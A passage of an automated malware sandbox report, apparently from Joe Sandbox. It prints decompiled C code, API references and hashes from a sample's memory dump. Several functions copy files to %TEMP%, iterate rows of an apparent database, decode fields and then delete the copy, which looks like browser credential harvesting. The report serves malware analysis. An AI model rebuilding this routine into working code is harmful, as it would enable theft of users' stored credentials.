				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				WCHAR* _t87;
				intOrPtr* _t102;
				intOrPtr _t104;
				intOrPtr* _t106;
				intOrPtr* _t110;
				intOrPtr* _t147;
				intOrPtr _t149;
				intOrPtr* _t151;
				void* _t153;
				intOrPtr* _t155;
				intOrPtr* _t159;
				void* _t161;
				intOrPtr* _t166;
				intOrPtr* _t172;
				intOrPtr* _t178;
				void* _t180;
				intOrPtr* _t184;
				void* _t187;
				intOrPtr _t208;
				intOrPtr _t210;
				void* _t216;
				intOrPtr _t222;
				intOrPtr _t226;
				intOrPtr _t227;
				void* _t228;
				void* _t229;

				_t224 = __esi;
				_t186 = __ebx;
				_t226 = _t227;
				_t187 = 0xb;
				do {
					_push(0);
					_push(0);
					_t187 = _t187 - 1;
					_t234 = _t187;
				} while (_t187 != 0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v12 = __edx;
				_v8 = __eax;
				E004040F4( &_v8);
				_push(_t226);
				_push(0x411163);
				_push( *[fs:eax]);
				 *[fs:eax] = _t227;
				E00403B80( &_v28);
				_push(_t226);
				_push(0x4110ce);
				_push( *[fs:eax]);
				 *[fs:eax] = _t227;
				E00406FDC(GetTickCount(), __ebx,  &_v52, __esi, _t234);
				_push(_v52);
				E00406F1C( &_v56, __ebx, __edi, __esi, _t234);
				_push(_v56);
				_push(L".tmp");
				E00403E1C();
				E0040781C(_v8, _t186,  &_v40, _t234);
				E004062D8(L"%TEMP%",  &_v64, _t234);
				_push(_v64);
				_push(0x41119c);
				_push(_v32);
				E00403E1C();
				E0040781C(_v60, _t186,  &_v44, _t234);
				_t87 = E00403D3C(_v44);
				CopyFileW(E00403D3C(_v40), _t87, 0xffffffff);
				E0040377C( &_v68, _v44);
				E00404AFC(_v68, _t186, _t187,  &_v36, _t224, _t234);
				E00403D2C( &_v72, _v36);
				if(E004076B0(_v72, _t186, _t187) != 0) {
					_t102 =  *0x41b55c; // 0x41c784
					_t104 =  *((intOrPtr*)( *_t102))(E00403990(_v36),  &_v16);
					_t228 = _t227 + 8;
					__eflags = _t104;
					if(_t104 == 0) {
						E00408120(0x66,  &_v76);
						_t147 =  *0x41b5cc; // 0x41c78c
						_t149 =  *((intOrPtr*)( *_t147))(_v16, E00403990(_v76), 0xffffffff,  &_v20,  &_v24);
						_t229 = _t228 + 0x14;
						__eflags = _t149;
						if(_t149 == 0) {
							while(1) {
								_t151 =  *0x41b600; // 0x41c790
								_t153 =  *((intOrPtr*)( *_t151))(_v20);
								__eflags = _t153 - 0x64;
								if(_t153 != 0x64) {
									goto L9;
								}
								_t155 =  *0x41b644; // 0x41c798
								_t159 =  *0x41b588; // 0x41c794
								_t161 =  *((intOrPtr*)( *_t159))(_v20, 3,  *((intOrPtr*)( *_t155))(_v20, 3));
								_pop(_t216);
								E004094C4(_t161,  &_v48, _t216);
								E00403D2C( &_v80, _v48);
								_t166 =  *0x41b588; // 0x41c794
								E00403C98( &_v84,  *((intOrPtr*)( *_t166))(_v20, 0, 0x4111a4, _v80, _v28));
								_t172 =  *0x41b588; // 0x41c794
								E00403C98( &_v88,  *((intOrPtr*)( *_t172))(_v20, 1, 0x4111a4, _v84));
								_t178 =  *0x41b588; // 0x41c794
								_t180 =  *((intOrPtr*)( *_t178))(_v20, 2, 0x4111b0, _v88);
								_t229 = _t229 + 0x28;
								E00403C98( &_v92, _t180);
								_push(_v92);
								_push(L"\r\n\r\n");
								E00403E1C();
								_t184 =  *0x41b584; // 0x41b0b4
								 *_t184 =  *_t184 + 1;
								__eflags =  *_t184;
							}
						}
					}
					L9:
					_t106 =  *0x41b654; // 0x41c79c
					 *((intOrPtr*)( *_t106))(_v20);
					_t110 =  *0x41b590; // 0x41c788
					 *((intOrPtr*)( *_t110))(_v16);
					_pop(_t208);
					 *[fs:eax] = _t208;
					E00403BBC(_v12, _v28);
					DeleteFileW(E00403D3C(_v44));
				} else {
					_pop(_t222);
					 *[fs:eax] = _t222;
				}
				_pop(_t210);
				 *[fs:eax] = _t210;
				_push(E0041116A);
				E00403B98( &_v92, 4);
				E004034E4( &_v76);
				E00403B80( &_v72);
				E004034E4( &_v68);
				E00403B98( &_v64, 4);
				E004034E4( &_v48);
				E00403B98( &_v44, 2);
				E004034E4( &_v36);
				E00403B98( &_v32, 2);
				return E00403B80( &_v8);
			}



















































                                                                      0x00410e70
                                                                      0x00410e70
                                                                      0x00410e71
                                                                      0x00410e73
                                                                      0x00410e78
                                                                      0x00410e78
                                                                      0x00410e7a
                                                                      0x00410e7c
                                                                      0x00410e7c
                                                                      0x00410e7c
                                                                      0x00410e7f
                                                                      0x00410e80
                                                                      0x00410e81
                                                                      0x00410e82
                                                                      0x00410e85
                                                                      0x00410e8b
                                                                      0x00410e92
                                                                      0x00410e93
                                                                      0x00410e98
                                                                      0x00410e9b
                                                                      0x00410ea1
                                                                      0x00410ea8
                                                                      0x00410ea9
                                                                      0x00410eae
                                                                      0x00410eb1
                                                                      0x00410ebc
                                                                      0x00410ec1
                                                                      0x00410ec7
                                                                      0x00410ecc
                                                                      0x00410ecf
                                                                      0x00410edc
                                                                      0x00410ee7
                                                                      0x00410ef4
                                                                      0x00410ef9
                                                                      0x00410efc
                                                                      0x00410f01
                                                                      0x00410f0c
                                                                      0x00410f17
                                                                      0x00410f21
                                                                      0x00410f30
                                                                      0x00410f3b
                                                                      0x00410f46
                                                                      0x00410f51
                                                                      0x00410f60
                                                                      0x00410f7c
                                                                      0x00410f83
                                                                      0x00410f85
                                                                      0x00410f88
                                                                      0x00410f8a
                                                                      0x00410fa2
                                                                      0x00410fb4
                                                                      0x00410fbb
                                                                      0x00410fbd
                                                                      0x00410fc0
                                                                      0x00410fc2
                                                                      0x00411091
                                                                      0x00411095
                                                                      0x0041109c
                                                                      0x0041109f
                                                                      0x004110a2
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00410fd3
                                                                      0x00410fe6
                                                                      0x00410fed
                                                                      0x00410ff5
                                                                      0x00410ff6
                                                                      0x00411004
                                                                      0x00411017
                                                                      0x00411028
                                                                      0x0041103b
                                                                      0x0041104c
                                                                      0x0041105f
                                                                      0x00411066
                                                                      0x00411068
                                                                      0x00411070
                                                                      0x00411075
                                                                      0x00411078
                                                                      0x00411085
                                                                      0x0041108a
                                                                      0x0041108f
                                                                      0x0041108f
                                                                      0x0041108f
                                                                      0x00411091
                                                                      0x00410fc2
                                                                      0x004110a8
                                                                      0x004110ac
                                                                      0x004110b3
                                                                      0x004110ba
                                                                      0x004110c1
                                                                      0x004110c6
                                                                      0x004110c9
                                                                      0x004110de
                                                                      0x004110ec
                                                                      0x00410f62
                                                                      0x00410f64
                                                                      0x00410f67
                                                                      0x00410f67
                                                                      0x004110f3
                                                                      0x004110f6
                                                                      0x004110f9
                                                                      0x00411106
                                                                      0x0041110e
                                                                      0x00411116
                                                                      0x0041111e
                                                                      0x0041112b
                                                                      0x00411133
                                                                      0x00411140
                                                                      0x00411148
                                                                      0x00411155
                                                                      0x00411162

                                                                      APIs
                                                                      • GetTickCount.KERNEL32 ref: 00410EB4
                                                                      • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,0041119C,?,.tmp,?,?,00000000,004110CE,?,00000000,00411163,?,00000000), ref: 00410F30
                                                                      • DeleteFileW.KERNEL32(00000000), ref: 004110EC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: File$CopyCountDeleteTick
                                                                      • String ID: $%TEMP%$.tmp
                                                                      • API String ID: 2381671008-2792595090
                                                                      • Opcode ID: 25513a2d6d90f056bd5cf02fe9c1dff5265798498166ca8350b0b3102dd1fa50
                                                                      • Instruction ID: ef1d9ef4a41f0d536355ae74e23377fcfc6b42a5aa152db35adc264ec6821d93
                                                                      • Opcode Fuzzy Hash: 25513a2d6d90f056bd5cf02fe9c1dff5265798498166ca8350b0b3102dd1fa50
                                                                      • Instruction Fuzzy Hash: 55910B31A40109AFDB00EB95DC82EDEBBB9EF48315F104436F514F72A2DB78AE458B58
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00401934 Relevance: 9.1, APIs: 6, Instructions: 62COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 71%
                                                                      			E00401934() {
				void* _t2;
				void* _t3;
				void* _t14;
				intOrPtr* _t19;
				intOrPtr _t23;
				intOrPtr _t26;
				intOrPtr _t28;

				_t26 = _t28;
				if( *0x41c5ac == 0) {
					return _t2;
				} else {
					_push(_t26);
					_push(E00401A0A);
					_push( *[fs:edx]);
					 *[fs:edx] = _t28;
					if( *0x41c035 != 0) {
						_push(0x41c5b4);
						L004011CC();
					}
					 *0x41c5ac = 0;
					_t3 =  *0x41c60c; // 0xe48210
					LocalFree(_t3);
					 *0x41c60c = 0;
					_t19 =  *0x41c5d4; // 0xe49764
					while(_t19 != 0x41c5d4) {
						VirtualFree( *(_t19 + 8), 0, 0x8000);
						_t19 =  *_t19;
					}
					E00401234(0x41c5d4);
					E00401234(0x41c5e4);
					E00401234(0x41c610);
					_t14 =  *0x41c5cc; // 0xe49210
					while(_t14 != 0) {
						 *0x41c5cc =  *_t14;
						LocalFree(_t14);
						_t14 =  *0x41c5cc; // 0xe49210
					}
					_pop(_t23);
					 *[fs:eax] = _t23;
					_push(0x401a11);
					if( *0x41c035 != 0) {
						_push(0x41c5b4);
						L004011D4();
					}
					_push(0x41c5b4);
					L004011DC();
					return 0;
				}
			}










                                                                      0x00401935
                                                                      0x0040193f
                                                                      0x00401a13
                                                                      0x00401945
                                                                      0x00401947
                                                                      0x00401948
                                                                      0x0040194d
                                                                      0x00401950
                                                                      0x0040195a
                                                                      0x0040195c
                                                                      0x00401961
                                                                      0x00401961
                                                                      0x00401966
                                                                      0x0040196d
                                                                      0x00401973
                                                                      0x0040197a
                                                                      0x0040197f
                                                                      0x00401999
                                                                      0x00401992
                                                                      0x00401997
                                                                      0x00401997
                                                                      0x004019a6
                                                                      0x004019b0
                                                                      0x004019ba
                                                                      0x004019bf
                                                                      0x004019c6
                                                                      0x004019ca
                                                                      0x004019d1
                                                                      0x004019d6
                                                                      0x004019db
                                                                      0x004019e1
                                                                      0x004019e4
                                                                      0x004019e7
                                                                      0x004019f3
                                                                      0x004019f5
                                                                      0x004019fa
                                                                      0x004019fa
                                                                      0x004019ff
                                                                      0x00401a04
                                                                      0x00401a09
                                                                      0x00401a09

                                                                      APIs
                                                                      • RtlEnterCriticalSection.KERNEL32(0041C5B4,00000000,00401A0A), ref: 00401961
                                                                      • LocalFree.KERNEL32(00E48210,00000000,00401A0A), ref: 00401973
                                                                      • VirtualFree.KERNEL32(?,00000000,00008000,00E48210,00000000,00401A0A), ref: 00401992
                                                                      • LocalFree.KERNEL32(00E49210,?,00000000,00008000,00E48210,00000000,00401A0A), ref: 004019D1
                                                                      • RtlLeaveCriticalSection.KERNEL32(0041C5B4,00401A11,00E48210,00000000,00401A0A), ref: 004019FA
                                                                      • RtlDeleteCriticalSection.KERNEL32(0041C5B4,00401A11,00E48210,00000000,00401A0A), ref: 00401A04
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                      • String ID:
                                                                      • API String ID: 3782394904-0
                                                                      • Opcode ID: a533093bf643e2750fc0c7fb6ce1a8cee2193e72f340cc35e9b9a59fd34ff9a9
                                                                      • Instruction ID: f5b3729ab89c308c15893b8da70c4d7314be5901088e834fcff69d5c90a64892
                                                                      • Opcode Fuzzy Hash: a533093bf643e2750fc0c7fb6ce1a8cee2193e72f340cc35e9b9a59fd34ff9a9
                                                                      • Instruction Fuzzy Hash: F11193B17843907ED715AB669CD1B927B969745708F50807BF100BA2F1C73DA840CF5D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00410BB8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 198fileCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 46%
                                                                      			E00410BB8(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				WCHAR* _t76;
				intOrPtr* _t91;
				void* _t93;
				intOrPtr* _t95;
				intOrPtr* _t99;
				intOrPtr* _t132;
				void* _t134;
				intOrPtr* _t136;
				void* _t138;
				intOrPtr* _t140;
				intOrPtr* _t146;
				void* _t148;
				void* _t154;
				intOrPtr _t174;
				intOrPtr _t176;
				intOrPtr _t184;
				intOrPtr _t188;
				intOrPtr _t189;
				void* _t190;
				void* _t191;

				_t186 = __esi;
				_t153 = __ebx;
				_t188 = _t189;
				_t154 = 9;
				do {
					_push(0);
					_push(0);
					_t154 = _t154 - 1;
					_t193 = _t154;
				} while (_t154 != 0);
				_push(_t154);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v12 = __edx;
				_v8 = __eax;
				E004040F4( &_v8);
				_push(_t188);
				_push(0x410e20);
				_push( *[fs:eax]);
				 *[fs:eax] = _t189;
				E00403B80( &_v28);
				_push(_t188);
				_push(0x410da0);
				_push( *[fs:eax]);
				 *[fs:eax] = _t189;
				E00406FDC(GetTickCount(), __ebx,  &_v48, __esi, _t193);
				_push(_v48);
				E00406F1C( &_v52, __ebx, __edi, __esi, _t193);
				_push(_v52);
				_push(L".tmp");
				E00403E1C();
				E0040781C(_v8, _t153,  &_v40, _t193);
				E004062D8(L"%TEMP%",  &_v60, _t193);
				_push(_v60);
				_push(E00410E58);
				_push(_v32);
				E00403E1C();
				E0040781C(_v56, _t153,  &_v44, _t193);
				_t76 = E00403D3C(_v44);
				CopyFileW(E00403D3C(_v40), _t76, 0xffffffff);
				E0040377C( &_v64, _v44);
				E00404AFC(_v64, _t153, _t154,  &_v36, _t186, _t193);
				E00403D2C( &_v68, _v36);
				if(E004076B0(_v68, _t153, _t154) != 0) {
					_t91 =  *0x41b55c; // 0x41c784
					_t93 =  *((intOrPtr*)( *_t91))(E00403990(_v36),  &_v16);
					_t190 = _t189 + 8;
					__eflags = _t93;
					if(_t93 == 0) {
						E00408120(0x65,  &_v72);
						_t132 =  *0x41b5cc; // 0x41c78c
						_t134 =  *((intOrPtr*)( *_t132))(_v16, E00403990(_v72), 0xffffffff,  &_v20,  &_v24);
						_t191 = _t190 + 0x14;
						__eflags = _t134;
						if(_t134 == 0) {
							while(1) {
								_t136 =  *0x41b600; // 0x41c790
								_t138 =  *((intOrPtr*)( *_t136))(_v20);
								__eflags = _t138 - 0x64;
								if(_t138 != 0x64) {
									goto L9;
								}
								_t140 =  *0x41b588; // 0x41c794
								E00403C98( &_v76,  *((intOrPtr*)( *_t140))(_v20, 0, _v28));
								_t146 =  *0x41b588; // 0x41c794
								_t148 =  *((intOrPtr*)( *_t146))(_v20, 1, E00410E60, _v76);
								_t191 = _t191 + 0x10;
								E00403C98( &_v80, _t148);
								_push(_v80);
								_push(E00410E68);
								E00403E1C();
							}
						}
					}
					L9:
					_t95 =  *0x41b654; // 0x41c79c
					 *((intOrPtr*)( *_t95))(_v20);
					_t99 =  *0x41b590; // 0x41c788
					 *((intOrPtr*)( *_t99))(_v16);
					_pop(_t174);
					 *[fs:eax] = _t174;
					E00403BBC(_v12, _v28);
					DeleteFileW(E00403D3C(_v44));
				} else {
					_pop(_t184);
					 *[fs:eax] = _t184;
				}
				_pop(_t176);
				 *[fs:eax] = _t176;
				_push(E00410E27);
				E00403B98( &_v80, 2);
				E004034E4( &_v72);
				E00403B80( &_v68);
				E004034E4( &_v64);
				E00403B98( &_v60, 6);
				E004034E4( &_v36);
				E00403B98( &_v32, 2);
				return E00403B80( &_v8);
			}










































                                                                      0x00410bb8
                                                                      0x00410bb8
                                                                      0x00410bb9
                                                                      0x00410bbb
                                                                      0x00410bc0
                                                                      0x00410bc0
                                                                      0x00410bc2
                                                                      0x00410bc4
                                                                      0x00410bc4
                                                                      0x00410bc4
                                                                      0x00410bc7
                                                                      0x00410bc8
                                                                      0x00410bc9
                                                                      0x00410bca
                                                                      0x00410bcb
                                                                      0x00410bce
                                                                      0x00410bd4
                                                                      0x00410bdb
                                                                      0x00410bdc
                                                                      0x00410be1
                                                                      0x00410be4
                                                                      0x00410bea
                                                                      0x00410bf1
                                                                      0x00410bf2
                                                                      0x00410bf7
                                                                      0x00410bfa
                                                                      0x00410c05
                                                                      0x00410c0a
                                                                      0x00410c10
                                                                      0x00410c15
                                                                      0x00410c18
                                                                      0x00410c25
                                                                      0x00410c30
                                                                      0x00410c3d
                                                                      0x00410c42
                                                                      0x00410c45
                                                                      0x00410c4a
                                                                      0x00410c55
                                                                      0x00410c60
                                                                      0x00410c6a
                                                                      0x00410c79
                                                                      0x00410c84
                                                                      0x00410c8f
                                                                      0x00410c9a
                                                                      0x00410ca9
                                                                      0x00410cc5
                                                                      0x00410ccc
                                                                      0x00410cce
                                                                      0x00410cd1
                                                                      0x00410cd3
                                                                      0x00410ceb
                                                                      0x00410cfd
                                                                      0x00410d04
                                                                      0x00410d06
                                                                      0x00410d09
                                                                      0x00410d0b
                                                                      0x00410d67
                                                                      0x00410d6b
                                                                      0x00410d72
                                                                      0x00410d75
                                                                      0x00410d78
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00410d18
                                                                      0x00410d29
                                                                      0x00410d3c
                                                                      0x00410d43
                                                                      0x00410d45
                                                                      0x00410d4d
                                                                      0x00410d52
                                                                      0x00410d55
                                                                      0x00410d62
                                                                      0x00410d62
                                                                      0x00410d67
                                                                      0x00410d0b
                                                                      0x00410d7a
                                                                      0x00410d7e
                                                                      0x00410d85
                                                                      0x00410d8c
                                                                      0x00410d93
                                                                      0x00410d98
                                                                      0x00410d9b
                                                                      0x00410db0
                                                                      0x00410dbe
                                                                      0x00410cab
                                                                      0x00410cad
                                                                      0x00410cb0
                                                                      0x00410cb0
                                                                      0x00410dc5
                                                                      0x00410dc8
                                                                      0x00410dcb
                                                                      0x00410dd8
                                                                      0x00410de0
                                                                      0x00410de8
                                                                      0x00410df0
                                                                      0x00410dfd
                                                                      0x00410e05
                                                                      0x00410e12
                                                                      0x00410e1f

                                                                      APIs
                                                                      • GetTickCount.KERNEL32 ref: 00410BFD
                                                                      • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00410E58,?,.tmp,?,?,00000000,00410DA0,?,00000000,00410E20,?,00000000), ref: 00410C79
                                                                      • DeleteFileW.KERNEL32(00000000), ref: 00410DBE
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: File$CopyCountDeleteTick
                                                                      • String ID: %TEMP%$.tmp
                                                                      • API String ID: 2381671008-3650661790
                                                                      • Opcode ID: 4a067d1f8ba6d400319fcf7a723a146227050b837b1c7306f0a806063b549887
                                                                      • Instruction ID: 978216aeb9802c3a8092c63d781cd7ad87e87d7acf88f4e3b280f19958954086
                                                                      • Opcode Fuzzy Hash: 4a067d1f8ba6d400319fcf7a723a146227050b837b1c7306f0a806063b549887
                                                                      • Instruction Fuzzy Hash: 7C710C71A00109AFDB00EBD5DC42ADEBBB9EF48318F50447AF514F7292DA78AE458A58
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00410900 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 197fileCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 46%
                                                                      			E00410900(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				WCHAR* _t76;
				intOrPtr* _t91;
				void* _t93;
				intOrPtr* _t95;
				intOrPtr* _t99;
				intOrPtr* _t132;
				void* _t134;
				intOrPtr* _t136;
				void* _t138;
				intOrPtr* _t140;
				intOrPtr* _t146;
				void* _t148;
				void* _t154;
				intOrPtr _t174;
				intOrPtr _t176;
				intOrPtr _t183;
				intOrPtr _t187;
				intOrPtr _t188;
				void* _t189;
				void* _t190;

				_t185 = __esi;
				_t153 = __ebx;
				_t187 = _t188;
				_t154 = 9;
				do {
					_push(0);
					_push(0);
					_t154 = _t154 - 1;
					_t192 = _t154;
				} while (_t154 != 0);
				_push(_t154);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v12 = __edx;
				_v8 = __eax;
				E004040F4( &_v8);
				_push(_t187);
				_push(0x410b63);
				_push( *[fs:eax]);
				 *[fs:eax] = _t188;
				E004034E4( &_v28);
				_push(_t187);
				_push(0x410ae8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t188;
				E00406FDC(GetTickCount(), __ebx,  &_v48, __esi, _t192);
				_push(_v48);
				E00406F1C( &_v52, __ebx, __edi, __esi, _t192);
				_push(_v52);
				_push(L".tmp");
				E00403E1C();
				E0040781C(_v8, _t153,  &_v40, _t192);
				E004062D8(L"%TEMP%",  &_v60, _t192);
				_push(_v60);
				_push(0x410b9c);
				_push(_v32);
				E00403E1C();
				E0040781C(_v56, _t153,  &_v44, _t192);
				_t76 = E00403D3C(_v44);
				CopyFileW(E00403D3C(_v40), _t76, 0xffffffff);
				E0040377C( &_v64, _v44);
				E00404AFC(_v64, _t153, _t154,  &_v36, _t185, _t192);
				E00403D2C( &_v68, _v36);
				if(E004076B0(_v68, _t153, _t154) != 0) {
					_t91 =  *0x41b55c; // 0x41c784
					_t93 =  *((intOrPtr*)( *_t91))(E00403990(_v36),  &_v16);
					_t189 = _t188 + 8;
					__eflags = _t93;
					if(_t93 == 0) {
						E00408120(0x11,  &_v72);
						_t132 =  *0x41b5cc; // 0x41c78c
						_t134 =  *((intOrPtr*)( *_t132))(_v16, E00403990(_v72), 0xffffffff,  &_v20,  &_v24);
						_t190 = _t189 + 0x14;
						__eflags = _t134;
						if(_t134 == 0) {
							while(1) {
								_t136 =  *0x41b600; // 0x41c790
								_t138 =  *((intOrPtr*)( *_t136))(_v20);
								__eflags = _t138 - 0x64;
								if(_t138 != 0x64) {
									goto L9;
								}
								_t140 =  *0x41b588; // 0x41c794
								E004036DC( &_v76,  *((intOrPtr*)( *_t140))(_v20, 0, _v28));
								_t146 =  *0x41b588; // 0x41c794
								_t148 =  *((intOrPtr*)( *_t146))(_v20, 1, 0x410ba8, _v76);
								_t190 = _t190 + 0x10;
								E004036DC( &_v80, _t148);
								_push(_v80);
								_push(E00410BB4);
								E00403850();
							}
						}
					}
					L9:
					_t95 =  *0x41b654; // 0x41c79c
					 *((intOrPtr*)( *_t95))(_v20);
					_t99 =  *0x41b590; // 0x41c788
					 *((intOrPtr*)( *_t99))(_v16);
					_pop(_t174);
					 *[fs:eax] = _t174;
					E00403D2C(_v12, _v28);
					DeleteFileW(E00403D3C(_v44));
				} else {
					_pop(_t183);
					 *[fs:eax] = _t183;
				}
				_pop(_t176);
				 *[fs:eax] = _t176;
				_push(E00410B6A);
				E00403508( &_v80, 3);
				E00403B80( &_v68);
				E004034E4( &_v64);
				E00403B98( &_v60, 6);
				E004034E4( &_v36);
				E00403B80( &_v32);
				E004034E4( &_v28);
				return E00403B80( &_v8);
			}










































                                                                      0x00410900
                                                                      0x00410900
                                                                      0x00410901
                                                                      0x00410903
                                                                      0x00410908
                                                                      0x00410908
                                                                      0x0041090a
                                                                      0x0041090c
                                                                      0x0041090c
                                                                      0x0041090c
                                                                      0x0041090f
                                                                      0x00410910
                                                                      0x00410911
                                                                      0x00410912
                                                                      0x00410913
                                                                      0x00410916
                                                                      0x0041091c
                                                                      0x00410923
                                                                      0x00410924
                                                                      0x00410929
                                                                      0x0041092c
                                                                      0x00410932
                                                                      0x00410939
                                                                      0x0041093a
                                                                      0x0041093f
                                                                      0x00410942
                                                                      0x0041094d
                                                                      0x00410952
                                                                      0x00410958
                                                                      0x0041095d
                                                                      0x00410960
                                                                      0x0041096d
                                                                      0x00410978
                                                                      0x00410985
                                                                      0x0041098a
                                                                      0x0041098d
                                                                      0x00410992
                                                                      0x0041099d
                                                                      0x004109a8
                                                                      0x004109b2
                                                                      0x004109c1
                                                                      0x004109cc
                                                                      0x004109d7
                                                                      0x004109e2
                                                                      0x004109f1
                                                                      0x00410a0d
                                                                      0x00410a14
                                                                      0x00410a16
                                                                      0x00410a19
                                                                      0x00410a1b
                                                                      0x00410a33
                                                                      0x00410a45
                                                                      0x00410a4c
                                                                      0x00410a4e
                                                                      0x00410a51
                                                                      0x00410a53
                                                                      0x00410aaf
                                                                      0x00410ab3
                                                                      0x00410aba
                                                                      0x00410abd
                                                                      0x00410ac0
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00410a60
                                                                      0x00410a71
                                                                      0x00410a84
                                                                      0x00410a8b
                                                                      0x00410a8d
                                                                      0x00410a95
                                                                      0x00410a9a
                                                                      0x00410a9d
                                                                      0x00410aaa
                                                                      0x00410aaa
                                                                      0x00410aaf
                                                                      0x00410a53
                                                                      0x00410ac2
                                                                      0x00410ac6
                                                                      0x00410acd
                                                                      0x00410ad4
                                                                      0x00410adb
                                                                      0x00410ae0
                                                                      0x00410ae3
                                                                      0x00410af8
                                                                      0x00410b06
                                                                      0x004109f3
                                                                      0x004109f5
                                                                      0x004109f8
                                                                      0x004109f8
                                                                      0x00410b0d
                                                                      0x00410b10
                                                                      0x00410b13
                                                                      0x00410b20
                                                                      0x00410b28
                                                                      0x00410b30
                                                                      0x00410b3d
                                                                      0x00410b45
                                                                      0x00410b4d
                                                                      0x00410b55
                                                                      0x00410b62

                                                                      APIs
                                                                      • GetTickCount.KERNEL32 ref: 00410945
                                                                      • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00410B9C,?,.tmp,?,?,00000000,00410AE8,?,00000000,00410B63,?,00000000), ref: 004109C1
                                                                      • DeleteFileW.KERNEL32(00000000), ref: 00410B06
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: File$CopyCountDeleteTick
                                                                      • String ID: %TEMP%$.tmp
                                                                      • API String ID: 2381671008-3650661790
                                                                      • Opcode ID: b6365babbb2d3b2e1b37703ec200a2ec6b79da26c3864396c2c11ec0f131d7bb
                                                                      • Instruction ID: 1e08b77d5c93ddd244bb37ca777f3c967e0d5c0e96542229b92685f54af29c93
                                                                      • Opcode Fuzzy Hash: b6365babbb2d3b2e1b37703ec200a2ec6b79da26c3864396c2c11ec0f131d7bb
                                                                      • Instruction Fuzzy Hash: DA710B71A04109AFDB00EF95DC41EDEBBB9EF48318F104476F514F72A2DA78AE458B58
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00402AC4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 65%
                                                                      			E00402AC4() {
				void* _v8;
				char _v12;
				int _v16;
				signed short _t12;
				signed short _t14;
				intOrPtr _t27;
				void* _t29;
				void* _t31;
				intOrPtr _t32;

				_t29 = _t31;
				_t32 = _t31 + 0xfffffff4;
				_v12 =  *0x41b018 & 0x0000ffff;
				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
					_t12 =  *0x41b018; // 0x1332
					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
					 *0x41b018 = _t14;
					return _t14;
				} else {
					_push(_t29);
					_push(E00402B35);
					_push( *[fs:eax]);
					 *[fs:eax] = _t32;
					_v16 = 4;
					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(0x402b3c);
					return RegCloseKey(_v8);
				}
			}












                                                                      0x00402ac5
                                                                      0x00402ac7
                                                                      0x00402ad1
                                                                      0x00402aed
                                                                      0x00402b3c
                                                                      0x00402b4e
                                                                      0x00402b51
                                                                      0x00402b5a
                                                                      0x00402aef
                                                                      0x00402af1
                                                                      0x00402af2
                                                                      0x00402af7
                                                                      0x00402afa
                                                                      0x00402afd
                                                                      0x00402b19
                                                                      0x00402b20
                                                                      0x00402b23
                                                                      0x00402b26
                                                                      0x00402b34
                                                                      0x00402b34

                                                                      APIs
                                                                      • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402AE6
